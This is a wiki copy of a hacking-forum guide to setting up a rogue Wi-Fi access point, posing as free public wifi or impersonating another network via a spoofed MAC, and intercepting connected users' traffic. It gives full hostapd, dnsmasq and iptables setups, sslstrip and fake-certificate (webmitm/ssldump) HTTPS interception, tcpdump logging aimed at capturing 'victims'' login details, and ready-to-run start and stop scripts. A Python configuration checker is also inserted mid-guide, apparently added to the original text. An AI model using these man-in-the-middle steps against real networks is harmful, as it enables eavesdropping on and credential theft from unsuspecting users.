From charlesreid1

Revision as of 16:45, 22 January 2016

Setting Up a Wifi Access Point and Dealing With SSL
Author: plasticFork
Date Released: 4/20/2012 - On HackBB.


Introduction

This is about setting up a wireless access point and then recording all traffic that passes through it, including two ways of dealing with ssl. This guide was written for Linux but the basic principle will still apply to other platforms like BSD; just some of the commands will be different, e.g. there is no iptables in BSD. There are probably other more advanced things you could do, like modifying the traffic passing through, but I won't go into that. This is an alternative to arp-poisoning but achieves pretty much the same thing, or the same state of affairs to be precise: traffic being passed through your machine. There are plenty of guides around for arp-poisoning but not so many for setting up access points. The parts about dealing with ssl traffic and logging traffic work exactly the same for arp-poisoning.

Hardware requirements

A wireless card for the access point and another network card for forwarding traffic to the internet. The second one can be either an ethernet or a wireless connection; they both work the same.

I'm not sure how "new" is "new", so you may have to do your own research to see if your wireless card is compatible. "All new mac80211 based drivers that implement AP functionality are supported with hostapd's nl80211 driver." http://linuxwireless.org/en/users/Documentation/hostapd

Setting up the AP

hostapd for turning the wireless card into an access point
dnsmasq for dhcp
iptables for NAT

Traffic monitoring

Option one
sslstrip
tcpdump

Option two
webmitm (dsniff)
ssldump

Setting up the AP

First things first, you need to connect your linux box to the internet. Like I mentioned before, an ethernet or wireless connection works just fine. If you go for the wireless route you'll need two network cards, one for the access point and one for the connection to the internet. The same card can't do both; that might sound obvious but you'd be surprised.... For the rest of this guide eth0 will be the interface connected to the internet. It's important you do this first; I had problems when I set up the access point first and connected to the internet later.

Configuring stuff

hostapd

(host access point daemon)

This is a program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is the part where you decide your network's ssid, encryption and password.

hostapd is configured with a file called /etc/hostapd/hostapd.conf

interface=wlan0
driver=nl80211
ssid=safe_free_public_wifi
channel=8
wpa=3
wpa_passphrase=secret_password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
hw_mode=g

You can leave off the 4 wpa... lines and it will just be an open access point, no password.

dnsmasq

This program will automatically assign ip addresses to the computers connecting to your ap. Without this the clients would need to set their own ip addresses by hand, which is not very friendly to the average Windows user.

dnsmasq is configured with a file called /etc/dnsmasq.conf

The important fields to have in this file are

interface=wlan0
dhcp-range=192.168.0.50,192.168.0.150,12h
dhcp-option=3,192.168.0.1

Note the ip address in the 3rd line needs to be the ip of the access point, which we'll set later. 192.168.0.1 is a good one.

iptables

This will forward traffic from wlan0 to eth0. Replace eth0 with your internet facing interface. If you're unfamiliar with iptables you can run these 5 lines individually from the terminal or put them into a text file and run it with "bash <filename>". We'll be putting all the required lines into a text file like this later on for simple startup/shutdown of the access point. The iptables commands stack together so you can add even more later. To clear all the current rules use iptables -F.

iptables -F
iptables -t nat -F
iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Start up wlan0

I think assigning a specific ip address to wlan0 is important since I ran into trouble when I didn't. The industry standard is to use 192.168.x.x for internal ip addresses; I'll just use 192.168.0.1. This is also the time to set the access point's mac address, either for anonymity reasons or to impersonate another access point. If you're making up your own mac address make sure the first block is even, i.e. 10, 12, 14 ... 1A, 1C, 1E.

ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15

or simply just

ifconfig wlan0 192.168.0.1 netmask 255.255.255.0

without the mac foolery.
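The three pieces above (hostapd.conf, dnsmasq.conf and the ifconfig line) have to agree with each other or clients get an address with no working gateway. As an added example that is not part of the original guide, here is a small Python check that reads all three and reports the mismatches that cause that: differing interface names, a dhcp-option 3 router that is not the AP address, a lease pool outside the AP subnet or containing the AP itself, and a WPA passphrase outside the 8-63 character range hostapd accepts. The config text is embedded as constructed strings copied from the values shown above; the function names are my own.

```python
import ipaddress
import re

# Constructed inputs mirroring the values shown in the guide (embedded so the check runs offline).
HOSTAPD_CONF = """\
interface=wlan0
driver=nl80211
ssid=safe_free_public_wifi
channel=8
wpa=3
wpa_passphrase=secret_password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
hw_mode=g
"""
DNSMASQ_CONF = """\
interface=wlan0
dhcp-range=192.168.0.50,192.168.0.150,12h
dhcp-option=3,192.168.0.1
"""
IFCONFIG_CMD = "ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15"


def parse_kv(text):
    """Parse the key=value lines hostapd and dnsmasq both use ('#' starts a comment; later duplicates win)."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def parse_ifconfig(cmd):
    """Pull interface, address/netmask and the optional MAC out of the ifconfig line."""
    m = re.match(r"ifconfig\s+(\S+)\s+(\S+)\s+netmask\s+(\S+)(?:\s+hw\s+ether\s+(\S+))?", cmd)
    if not m:
        raise ValueError("unrecognised ifconfig command")
    iface, addr, mask, mac = m.groups()
    return iface, ipaddress.IPv4Interface(f"{addr}/{mask}"), mac


def check_ap_config(hostapd_text, dnsmasq_text, ifconfig_cmd):
    """Return a list of problems; an empty list means the three pieces agree."""
    h, d = parse_kv(hostapd_text), parse_kv(dnsmasq_text)
    iface, net, mac = parse_ifconfig(ifconfig_cmd)
    ap_ip, subnet = net.ip, net.network
    problems = []
    if not (h.get("interface") == d.get("interface") == iface):
        problems.append("interface differs between hostapd, dnsmasq and ifconfig")

    # dhcp-option=3 is the default gateway handed to clients: it must be the AP itself.
    opt = d.get("dhcp-option", "")
    if not opt.startswith("3,"):
        problems.append("no dhcp-option=3 router entry")
    elif ipaddress.IPv4Address(opt.split(",")[1]) != ap_ip:
        problems.append("dhcp-option 3 (router) does not match the AP address")

    # The lease pool must lie inside the AP's subnet and must not contain the AP.
    rng = d.get("dhcp-range", "").split(",")
    if len(rng) < 2:
        problems.append("dhcp-range missing or malformed")
    else:
        lo, hi = ipaddress.IPv4Address(rng[0]), ipaddress.IPv4Address(rng[1])
        if lo not in subnet or hi not in subnet:
            problems.append("dhcp-range lies outside the AP subnet")
        if lo <= ap_ip <= hi:
            problems.append("AP address sits inside the dhcp-range pool")

    # hostapd only accepts a WPA passphrase of 8 to 63 characters when wpa is enabled.
    if h.get("wpa", "0") != "0" and not 8 <= len(h.get("wpa_passphrase", "")) <= 63:
        problems.append("wpa_passphrase must be 8-63 characters")

    # A made-up MAC needs an even first octet (multicast bit clear), as the guide notes.
    if mac and int(mac.split(":")[0], 16) % 2:
        problems.append("MAC first octet is odd")
    return problems
```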

Dealing with SSL

Of course you don't *have* to deal with ssl traffic you can just ignore it. But here are two ways of dealing with it

Method 1 sslstrip

Least conspicuous. This essentially redirects https traffic to http. The user may notice that a website does not say https in the address bar when it should, and the browser may give a warning that the user is submitting unencrypted data, so it's not completely invisible. However these are things most users ignore...

sslstrip is written in python so there's no need to compile it/find a precompiled binary. You can download it here www.thoughtcrime.org/software/sslstrip/

There is no need to configure sslstrip itself but you will need an extra iptables rule. All traffic bound for port 80 needs to be redirected to a port that sslstrip is listening on. Then sslstrip will do its magic.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

Then run it with

python sslstrip.py -l 9000 -f lock.ico

You can leave out the -f lock.ico. This is a cheap padlock favicon picture that will display in the victim's browser when they try to visit a https site (and sslstrip redirects it to the http version). Cute but it could also raise extra suspicion so use your own judgement.

Note this does not work against every website. Torproject.org for example is unaffected. Also this trumps the httpseverywhere add-on.

Method 2 full fat man in the middle

This is generating a fake certificate, using that to encrypt/decrypt all ssl traffic. It's not as hard as it sounds but it comes with the major disadvantage that if you're making your own certificate web browsers like firefox will flag this up to the user and force them to go through a painstaking "add security exception" screen which is not very subtle at all and will frankly fail with a lot of targets.

To do this we need an iptables rule, a program called ssldump and a program called webmitm, which is part of a package called dsniff.

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT

Then run it with

webmitm -d

You'll be guided through making a certificate. The less believable your answers, the less believable your certificate.

ssldump -n -d -k webmitm.crt >> ssldump.log

Recording traffic

There are plenty of guides on how to do this with wireshark, tshark (wireshark cli if you're not running X) and tcpdump.

Here's a quick example of using tcpdump

tcpdump -i wlan0 -s 0 -Apnq >> logfile

-i wlan0 is the interface to listen on. You could also use eth0, but that would also capture packets originating from the machine the ap is running on.

-s 0 sets the snapshot length so the whole of every packet is captured rather than the default truncated amount

-A outputs the data in ascii, which is useful if you're sniffing for login details

-p prevents the card from entering promiscuous mode. This might not be needed but we don't want to pick up traffic from other nearby access points.

-n and -q are just options to leave out some information we're not interested in (name resolution and verbose protocol detail).

There are also other tools available which will listen and parse out passwords and interesting things automatically. I'll admit I'm rather immaturely motivated by watching all of my victims' traffic, not just the passwords.

Easy start/stop

Ok so now we need to put it all together into a convenient script file.

#!/bin/bash
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0
dnsmasq
iptables -F
iptables -t nat -F
iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
hostapd -d /etc/hostapd/hostapd.conf &


For sslstrip

#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
python sslstrip.py -l 9000 -f lock.ico &
tcpdump -i wlan0 -s 0 -Apnq >> /home/plasticFork/logfile &

for webmitm

#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
webmitm -d
ssldump -n -d -k webmitm.crt >> ssldump.log &

and here's a bring down script

#!/bin/bash
ifconfig wlan0 down
killall dnsmasq
iptables -F
killall hostapd
killall sslstrip
killall tcpdump
killall webmitm
killall ssldump